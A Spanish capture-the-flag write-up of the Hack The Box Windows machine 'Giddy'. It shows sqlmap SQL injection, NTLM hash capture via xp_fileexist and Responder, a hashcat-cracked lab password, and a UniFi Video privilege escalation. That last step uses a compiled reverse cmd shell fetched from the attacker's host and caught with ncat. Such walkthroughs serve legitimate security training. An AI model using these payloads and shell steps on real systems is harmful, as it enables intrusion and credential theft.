Me gustan estas maquinas, porque no sabes nunca lo que podrás aprender o con cuantas paredes te vas a topar. Aprendí sobre como pasar la hash desde mssql, como ejecutar remotamente powershell y finalmente que a veces es mas fácil compilar y ejecutar que esperar soluciones mágicas.

Machine info

La información que tenemos de la máquina es:

Name Maker OS IP Address
Giddy lkys37en Windows 10.10.10.104

Su tarjeta de presentación es:

Card Info

Port Scanning

Comenzamos por realizar un escaneo de puertos usando nuestra herramienta nmap, pero luego vemos que tardaría bastante porque empezó a tener muchos drops:

root@laptop:~# nmap -sS -p- -n --open -v 10.10.10.104
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-15 08:55 CST
Initiating Ping Scan at 08:55
Scanning 10.10.10.104 [4 ports]
Completed Ping Scan at 08:55, 0.44s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 08:55
Scanning 10.10.10.104 [65535 ports]
Discovered open port 3389/tcp on 10.10.10.104
Discovered open port 80/tcp on 10.10.10.104
Discovered open port 443/tcp on 10.10.10.104
SYN Stealth Scan Timing: About 2.51% done; ETC: 09:15 (0:20:05 remaining)
SYN Stealth Scan Timing: About 3.89% done; ETC: 09:21 (0:25:08 remaining)
SYN Stealth Scan Timing: About 6.19% done; ETC: 09:19 (0:22:59 remaining)
SYN Stealth Scan Timing: About 8.71% done; ETC: 09:21 (0:24:17 remaining)
Increasing send delay for 10.10.10.104 from 0 to 5 due to 40 out of 133 dropped probes since last increase.
Increasing send delay for 10.10.10.104 from 5 to 10 due to 11 out of 22 dropped probes since last increase.
SYN Stealth Scan Timing: About 8.90% done; ETC: 09:26 (0:28:50 remaining)
Increasing send delay for 10.10.10.104 from 10 to 20 due to 11 out of 23 dropped probes since last increase.
SYN Stealth Scan Timing: About 9.28% done; ETC: 09:30 (0:32:25 remaining)
Increasing send delay for 10.10.10.104 from 20 to 40 due to 11 out of 22 dropped probes since last increase.

Logramos identificar al menos tres puertos. Realicemos el escaneo ahora con masscan:

root@laptop:~# masscan -e tun0 -p0-65535,U:0-65535 --rate 500 10.10.10.104

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-02-15 03:07:13 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131072 ports/host]
Discovered open port 5985/tcp on 10.10.10.104
Discovered open port 443/tcp on 10.10.10.104
Discovered open port 3389/tcp on 10.10.10.104
Discovered open port 80/tcp on 10.10.10.104

Como podemos ver, tenemos abiertos los mismos puertos que nmap descubrió más uno nuevo, 5995/tcp. Continuemos con la enumeración de servicios.

Services Identification

Lanzamos un nmap ahora con destino a los 4 puertos descubiertos:

root@laptop:~# nmap -p80,443,3389,5985 -A -T4 10.10.10.104
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-14 21:48 CST
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 21:49 (0:00:00 remaining)
Nmap scan report for 10.10.10.104
Host is up (0.20s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after:  2018-09-14T21:28:55
|_ssl-date: 2019-02-15T03:49:08+00:00; 0s from scanner time.
| tls-alpn:
|   h2
|_  http/1.1
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2019-02-14T01:47:31
|_Not valid after:  2019-08-16T01:47:31
|_ssl-date: 2019-02-15T03:49:07+00:00; 0s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|10 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (90%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   200.40 ms 10.10.12.1
2   201.47 ms 10.10.10.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.76 seconds

Resaltan dos cosas; la primera el commonName del cert de https PowerShellWebAccessTestWebSite y el nombre de la maquina Giddy.

Continuemos por analizar el servicio HTTP y HTTPS.

httpie

Comenzamos por realizar una petición http al servidor:

xbytemx@laptop:~/htb/giddy$ http 10.10.10.104
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 700
Content-Type: text/html
Date: Sat, 15 Feb 2019 15:06:19 GMT
ETag: "d07343e3466d41:0"
Last-Modified: Sun, 17 Jun 2018 14:24:23 GMT
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
	color:#000000;
	background-color:#ffffff;
	margin:0;
}

#container {
	margin-left:auto;
	margin-right:auto;
	text-align:center;
	}

a img {
	border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="giddy.jpg" alt="IIS" width="960" height="600" /></a>
</div>
</body>
</html>

Como veremos en un navegador, se nos da un link y una imagen de un perrito. Si realizamos la misma operación sobre https, tendremos el mismo resultado. Esto nos puede indicar que solo la capa de transporte cambia, pero es el mismo servidor web.

Busquemos más sobre estos servicios web.

Gobuster

Ejecutamos gobuster con los parámetros tradicionales y menos extensos, pero se omiten los errores de conexión para no llenar de spam:

xbytemx@laptop:~/htb/friendzone$ ~/tools/gobuster -u http://10.10.10.104/ -w ~/git/payloads/owasp/dirbuster/directory-list-2.3-small.tx
t -t 20 -x php,html,txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.104/
[+] Threads      : 20
[+] Wordlist     : /home/xbytemx/git/payloads/owasp/dirbuster/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php,html,txt
[+] Timeout      : 10s
=====================================================
2019/02/15 11:31:01 Starting gobuster
=====================================================
/remote (Status: 302)
/mvc (Status: 301)

Encontramos dos directorios, el primero llamado remote y el segundo llamada mvc

Remote Home de /remote

mvc Home de /mvc

La primera resulta ser el portal de acceso remoto sobre powershell, mientras que la segunda parece alguna aplicación de productos de bicicleta. Si ponemos el mouse sobre alguno de estos objetos veremos que dentro de la URL esta harcodeado el numero de ID, por lo que probaremos con un SQLi.

SQLi

Iniciamos usando sqlmap sin opciones para analizar el resultado:

xbytemx@laptop:~$ sqlmap -u "http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18"
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.2#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:55:54 /2019-02-15/

[11:55:54] [INFO] testing connection to the target URL
[11:55:54] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:55:55] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
do you want sqlmap to try to detect backend WAF/IPS? [y/N]
[11:55:59] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10')
[11:55:59] [INFO] testing if the target URL content is stable
[11:55:59] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[11:56:18] [INFO] searching for dynamic content
[11:56:18] [INFO] dynamic content marked for removal (1 region)
[11:56:19] [INFO] testing if GET parameter 'ProductSubCategoryId' is dynamic
[11:56:19] [INFO] GET parameter 'ProductSubCategoryId' appears to be dynamic
[11:56:19] [INFO] heuristic (basic) test shows that GET parameter 'ProductSubCategoryId' might be injectable (possible DBMS: 'Microsoft SQL Server')
[11:56:19] [INFO] testing for SQL injection on GET parameter 'ProductSubCategoryId'
it looks like the back-end DBMS is 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n]
[11:56:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:56:30] [WARNING] reflective value(s) found and filtering out
[11:56:30] [INFO] GET parameter 'ProductSubCategoryId' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:56:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[11:56:30] [INFO] GET parameter 'ProductSubCategoryId' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' injectable
[11:56:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:56:31] [INFO] GET parameter 'ProductSubCategoryId' is 'Microsoft SQL Server/Sybase inline queries' injectable
[11:56:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[11:56:31] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
[11:56:45] [INFO] GET parameter 'ProductSubCategoryId' appears to be 'Microsoft SQL Server/Sybase stacked queries (comment)' injectable
[11:56:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[11:56:56] [INFO] GET parameter 'ProductSubCategoryId' appears to be 'Microsoft SQL Server/Sybase time-based blind (IF)' injectable
[11:56:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:56:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:56:56] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:56:57] [INFO] target URL appears to have 25 columns in query
[11:56:58] [WARNING] combined UNION/error-based SQL injection case found on column 4. sqlmap will try to find another column with better characteristics
[11:56:59] [WARNING] combined UNION/error-based SQL injection case found on column 1. sqlmap will try to find another column with better characteristics
[11:57:00] [WARNING] combined UNION/error-based SQL injection case found on column 20. sqlmap will try to find another column with better characteristics
GET parameter 'ProductSubCategoryId' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 75 HTTP(s) requests:
---
Parameter: ProductSubCategoryId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ProductSubCategoryId=18 AND 9242=9242

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: ProductSubCategoryId=18 AND 6303 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (6303=6303) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113)))

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: ProductSubCategoryId=(SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7727=7727) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ProductSubCategoryId=18;WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: ProductSubCategoryId=18 WAITFOR DELAY '0:0:5'
---
[11:57:43] [INFO] testing Microsoft SQL Server
[11:57:43] [INFO] confirming Microsoft SQL Server
[11:57:45] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 10 or 2016
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 10.0
back-end DBMS: Microsoft SQL Server 2016
[11:57:45] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 49 times
[11:57:45] [INFO] fetched data logged to text files under '/home/xbytemx/.sqlmap/output/10.10.10.104'

[*] ending @ 11:57:45 /2019-02-15/

El resumen es parámetro ProductSubCategoryId es susceptible a SQLi, la DB es Microsoft SQL Server 2016, y tenemos bastantes puntos de inyección como se ve en la parte superior.

Lo siguiente que hice fue sacar a los usuarios, las tablas y los passwords, lo resumo con los resultados:

sqlmap -u "http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18" --table --users --passwords

[11:58:04] [INFO] fetching database users
[11:58:04] [INFO] used SQL query returns 3 entries
[11:58:05] [INFO] retrieved: 'BUILTIN\\Users'
[11:58:05] [INFO] retrieved: 'giddy\\stacy'
[11:58:05] [INFO] retrieved: 'sa'

[11:58:05] [INFO] fetching database users password hashes
[11:58:06] [WARNING] the SQL query provided does not return any output
[11:58:06] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:58:06] [WARNING] the SQL query provided does not return any output
[11:58:06] [INFO] fetching database users
[11:58:06] [INFO] used SQL query returns 3 entries
[11:58:06] [INFO] resumed: 'BUILTIN\\Users'
[11:58:06] [INFO] resumed: 'giddy\\stacy'
[11:58:06] [INFO] resumed: 'sa'
[11:58:19] [ERROR] unable to retrieve the password hashes for the database users (probably because the DBMS current user has no read privileges over the relevant system database table(s))

[11:58:19] [INFO] fetching database names
[11:58:20] [INFO] used SQL query returns 5 entries
[11:58:20] [INFO] retrieved: 'Injection'
[11:58:20] [INFO] retrieved: 'master'
[11:58:20] [INFO] retrieved: 'model'
[11:58:21] [INFO] retrieved: 'msdb'
[11:58:21] [INFO] retrieved: 'tempdb'
[11:58:21] [INFO] fetching tables for databases: Injection, master, model, msdb, tempdb
Database: Injection
[13 tables]
+----------------------------------------------------------+
| Applications                                             |
| CreditCard                                               |
| Memberships                                              |
| Product                                                  |
| ProductCategory                                          |
| ProductSubcategory                                       |
| Profiles                                                 |
| Roles                                                    |
| Users                                                    |
| UsersInRoles                                             |
| UsersOpenAuthAccounts                                    |
| UsersOpenAuthData                                        |
| __MigrationHistory                                       |
+----------------------------------------------------------+

Database: master
[488 tables]

Database: msdb
[23 tables]
+----------------------------------------------------------+
| autoadmin_backup_configuration_summary                   |
| backupfile                                               |
| backupmediafamily                                        |
| backupmediaset                                           |
| backupset                                                |
| dm_hadr_automatic_seeding_history                        |
| logmarkhistory                                           |
| restorefile                                              |
| restorefilegroup                                         |
| restorehistory                                           |
| suspect_pages                                            |
| sysdac_instances                                         |
| syspolicy_conditions                                     |
| syspolicy_configuration                                  |
| syspolicy_object_sets                                    |
| syspolicy_policies                                       |
| syspolicy_policy_categories                              |
| syspolicy_policy_category_subscriptions                  |
| syspolicy_policy_execution_history                       |
| syspolicy_policy_execution_history_details               |
| syspolicy_system_health_state                            |
| syspolicy_target_set_levels                              |
| syspolicy_target_sets                                    |
+----------------------------------------------------------+

Después de buscar y buscar dentro de la DB, opte por un approach diferente… Probar que puede ejecutarse desde este proceso dentro del sistema operativo. Claro lo mas evidente fue usar –os-cmd, pero este fallo. No cerrándome a este resultado, abrí google e investigue un poco, llegando a varios artículos interesantes:

Esto me genero la idea de que si era posible lanzar xp_dirtree o xp_fileexist hacia responder, podríamos capturar el hash.

exec xp_fileexist

Iniciamos por abrir en una consola Responder con python Responder.py -wrf -I tun0. En otra consola iniciamos sqlmap en modo sql-shell y ejecutamos el exec:

xbytemx@laptop:~$ sqlmap -u "http://10.10.10.104/mvc/Product.aspx?ProductSubCategoryId=18" --sql-shell
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.2#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:02:53 /2019-02-15/

[14:02:53] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:02:53] [INFO] testing connection to the target URL
[14:02:53] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ProductSubCategoryId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ProductSubCategoryId=18 AND 9242=9242

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: ProductSubCategoryId=18 AND 6303 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (6303=6303) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113)))

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: ProductSubCategoryId=(SELECT CHAR(113)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (7727=7727) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ProductSubCategoryId=18;WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF)
    Payload: ProductSubCategoryId=18 WAITFOR DELAY '0:0:5'
---
[14:02:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 10 or 2016
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 10.0
back-end DBMS: Microsoft SQL Server 2016
[14:02:53] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql-shell> exec master..xp_fileexist '\\10.10.13.121\miau'-- -
exec master..xp_fileexist '\\10.10.13.121\miau'-- -:    'NULL'

En nuestra consola de responder veremos:

[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 10.10.10.104
[SMB] NTLMv2-SSP Username : GIDDY\Stacy
[SMB] NTLMv2-SSP Hash     : Stacy::GIDDY:1122334455667788:B9F9548A74894D13A0FC9DCCAD19ED75:0101000000000000300341DE69C5D401E59EA796893B59570000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D004200310032000800300030000000000000000000000000300000E520622AF481D040F54B36E7D48F871AAABD6B2FEF077311B50C0859DD35C8A90A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310033002E003100320031000000000000000000
[SMB] Requested Share     : \\10.10.13.121\IPC$
[*] Skipping previously captured hash for GIDDY\Stacy
[SMB] Requested Share     : \\10.10.13.121\TEST

Yei, ya tenemos el hash del usuario stacy. Ahora pasemos a romper la hash.

hashcat

Usando Hashcat, rompemos la hash que acabamos de obtener. El diccionario usado fue rockyou.

xbytemx@laptop:~$ hashcat -a 0 -m 5600 "Stacy::GIDDY:1122334455667788:B9F9548A74894D13A0FC9DCCAD19ED75:0101000000000000300341DE69C5D401E59EA796893B59570000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D004200310032000800300030000000000000000000000000300000E520622AF481D040F54B36E7D48F871AAABD6B2FEF077311B50C0859DD35C8A90A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310033002E003100320031000000000000000000" ~/wl/rockyou.txt
...
STACY::GIDDY:1122334455667788:b9f9548a74894d13a0fc9dccad19ed75:0101000000000000300341de69c5d401e59ea796893b59570000000002000a0053004d0042003100320001000a0053004d0042003100320004000a0053004d0042003100320003000a0053004d0042003100320005000a0053004d004200310032000800300030000000000000000000000000300000e520622af481d040f54b36e7d48f871aaabd6b2fef077311b50c0859dd35c8a90a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310033002e003100320031000000000000000000:xNnWo6272k7x

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NetNTLMv2
Hash.Target......: STACY::GIDDY:1122334455667788:b9f9548a74894d13a0fc9...000000
Time.Started.....: Fri Feb 15 14:13:35 2019 (3 secs)
Time.Estimated...: Fri Feb 15 14:13:38 2019 (0 secs)
Guess.Base.......: File (/home/xbytemx/wl/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   816.2 kH/s (4.41ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 2691072/14344384 (18.76%)
Rejected.........: 0/2691072 (0.00%)
Restore.Point....: 2686976/14344384 (18.73%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: xamula -> x21blfam

Started: Fri Feb 15 14:13:25 2019
Stopped: Fri Feb 15 14:13:40 2019

Creds

Las credenciales de stacy son:

stacy / xNnWo6272k7x

Logging as stacy

Aquí comenzó la travesía mas incomoda, ya que se podía acceder a la maquina por el portal de remote, pero estaba limitado a dos sesiones para stacy, por lo que había que esperar a que se soltara la sesión. Esto me llevo a buscar alternativas y me encontré con una bastante coqueta, usar una instancia de docker con powershell modificado para correr PSSesion soportando autenticación sobre NTLM. Esto es bastante ventajoso, ya que como recordamos el puerto WinRM, 5985/tcp, se encuentra abierto.

Un poco mas de información al respecto puede ser consultado aquí.

Comenzamos por descargar y ejecutar la instancia:

xbytemx@laptop:~/htb/giddy$ docker run -it quickbreach/powershell-ntlm
Unable to find image 'quickbreach/powershell-ntlm:latest' locally
latest: Pulling from quickbreach/powershell-ntlm
aeb7866da422: Pull complete
2011ef2c2dfb: Pull complete
43e50d384a14: Pull complete
9b8c213e2ea6: Pull complete
580adfdbbe6e: Pull complete
e6ec163021cb: Pull complete
Digest: sha256:81cb6748bbf055f65de83f62d91e924d9ff674b9a9223ad6e02c425db12b6a32
Status: Downloaded newer image for quickbreach/powershell-ntlm:latest
PowerShell 6.1.1

https://aka.ms/pscore6-docs
Type 'help' to get help.

PS />

Ahora generamos las credenciales y probaremos una conexión al servidor:

PS /> $creds = Get-Credential

PowerShell credential request
User: stacy
Password for user stacy: ************

PS /> Enter-PSSession -ComputerName 10.10.10.104 -Authentication Negotiate -Credential $creds
[10.10.10.104]: PS C:\Users\Stacy\Documents> ls


    Directory: C:\Users\Stacy\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/16/2019   1:04 AM                WindowsPowerShell
-a----        2/16/2019   1:07 AM             14 unifivideo

Boom, estamos adentro.

user.txt

type c:\Users\Stacy\Desktop\user.txt

PrivEsc

Al entrar lo primeeeero que me llama la atención es el archivo unifivideo, que si mal no recordé en ese momento, se trata de uno de los productos de Ubiquiti. Buscando con google acerca de este producto, encontraremos un exploit local, el cual abusa de los privilegios de la carpeta unifi-video, ya que el servicio avService.exe que corre con la cuenta NT AUTHORITY/SYSTEM, le otorga sus permisos (ACL). El riesgo es que es posible ejecutar un archivo arbitrario “taskkill.exe” como NT AUTHORITY/SYSTEM, porque cada vez que el servicio es iniciado y terminado, busca primero dentro de la carpeta “C:\ProgramData\unifi-video" si el ejecutable se encuentra.

Cualquier usuario que pueda escribir en “C:\ProgramData\unifi-video" y que pueda iniciar y terminar el servicio, podrá explotar esta vulnerabilidad. Y eso es precisamente lo que vamos a hacer.

Primero verificamos que la versión instalada es vulnerable, buscando el archivo de configuración dentro de la carpeta “C:\ProgramData\unifi-video":

[10.10.10.104]: PS C:\Users\Stacy> cd c:\programdata\unifi-video\
[10.10.10.104]: PS C:\programdata\unifi-video> dir


    Directory: C:\programdata\unifi-video


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/16/2018   9:54 PM                bin
d-----        6/16/2018   9:55 PM                conf
d-----        6/16/2018  10:56 PM                data
d-----        6/16/2018   9:54 PM                email
d-----        6/16/2018   9:54 PM                fw
d-----        6/16/2018   9:54 PM                lib
d-----        2/16/2019  12:19 AM                logs
d-----        6/16/2018   9:55 PM                webapps
d-----        6/16/2018   9:55 PM                work
-a----        7/26/2017   6:10 PM         219136 avService.exe
-a----        2/16/2019  12:00 AM          34855 hs_err_pid1328.log
-a----        2/16/2019  12:00 AM      471599465 hs_err_pid1328.mdmp
-a----        6/17/2018  11:23 AM          31685 hs_err_pid1992.log
-a----        6/17/2018  11:23 AM      534204321 hs_err_pid1992.mdmp
-a----        8/16/2018   7:47 PM              0 hs_err_pid2036.mdmp
-a----        2/16/2019  12:19 AM          34477 hs_err_pid3336.log
-a----        2/16/2019  12:19 AM      523514725 hs_err_pid3336.mdmp
-a----        6/16/2018   9:54 PM            780 Ubiquiti UniFi Video.lnk
-a----        7/26/2017   6:10 PM          48640 UniFiVideo.exe
-a----        7/26/2017   6:10 PM          32038 UniFiVideo.ico
-a----        6/16/2018   9:54 PM          89050 Uninstall.exe


[10.10.10.104]: PS C:\programdata\unifi-video> cat .\data\system.properties
# unifi-video v3.7.3
#Sat Jun 16 21:58:13 EDT 2018
is_default=false
uuid=e79d440a-62cd-4274-95c3-d746cbb3b817
# app.http.port = 7080
# app.https.port = 7443
# ems.liveflv.port = 6666
# ems.livews.port = 7445
# ems.livewss.port = 7446
# ems.rtmp.enable = true
# ems.rtmp.port = 1935
# ems.rtsp.enable = true
# ems.rtsp.port = 7447

Como podemos ver, la versión 3.7.3 es vulnerable.

Iniciamos por ver como carajos se llama el servicio, esta parte requirió de pasar un rato revisando notas en github, pero finalmente llegue a la opción necesaria:

[10.10.10.104]: PS C:\programdata\unifi-video> Get-ChildItem -recurse HKLM:\SYSTEM\CurrentControlSet\Services | findstr -i "unifi"
                               Microsoft-Windows-Unified-Telemetry-Client           :
                               Microsoft-Windows-Unified-Telemetry-Client           :
UniFiVideoService              Type            : 16
                               ImagePath       : C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService
                               DisplayName     : Ubiquiti UniFi Video
                               Description     : Ubiquiti UniFi Video Service
    Hive: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UniFiVideoService
[10.10.10.104]: PS C:\programdata\unifi-video>

Ya tengo el nombre del servicio, ya verificamos que es vulnerable. Ahora solo falta nuestro ejecutable a lanzar.

cmd reverse shell

En este caso, como no me convencio usar MSF, busque alternativas y me tope con una muy interesante. Se trata del código fuente en cpp, para generar un binario para windows desde linux, que lanza el proceso cmd.exe y realizar una conexión inversa hacia la maquina del atacante.

En el código solo modificamos los parámetros de host y port y compilamos.

La función main queda así:

int main(int argc, char **argv) {
    FreeConsole();
    if (argc == 3) {
        int port  = atoi(argv[2]); //Converting port in Char datatype to Integer format
        RunShell(argv[1], port);
    }
    else {
        char host[] = "10.10.13.121";
        int port = 3001;
        RunShell(host, port);
    }
    return 0;
}

Compilamos:

i686-w64-mingw32-g++ r.cpp -o r.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

Abrimos una ncat para esperar la conexión, ejecutamos el modulo de python para iniciar un servidor web y descargamos el archivo:

Shell1:

[10.10.10.104]: PS C:\programdata\unifi-video> wget http://10.10.13.121:4001/r.exe -O taskkill.exe

Shell2:

xbytemx@laptop:~/htb/giddy/www$ python -m SimpleHTTPServer 4001
Serving HTTP on 0.0.0.0 port 4001 ...
10.10.10.104 - - [16/Feb/2019 01:24:09] "GET /r.exe HTTP/1.1" 200 -

Shell3:

xbytemx@laptop:~/htb/giddy$ ncat -vnlp 3001
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::3001
Ncat: Listening on 0.0.0.0:3001

Exploiting

Ahora solo necesitamos detener el servicio UniFiVideoService y esperar en Shell3:

Shell1:

[10.10.10.104]: PS C:\programdata\unifi-video> stop-service UniFiVideoService
WARNING: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
WARNING: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
WARNING: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
WARNING: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
WARNING: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
WARNING: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
WARNING: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
WARNING: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
WARNING: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...

Shell3:

xbytemx@laptop:~/htb/giddy$ ncat -vnlp 3001
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::3001
Ncat: Listening on 0.0.0.0:3001
Ncat: Connection from 10.10.10.104.
Ncat: Connection from 10.10.10.104:50970.
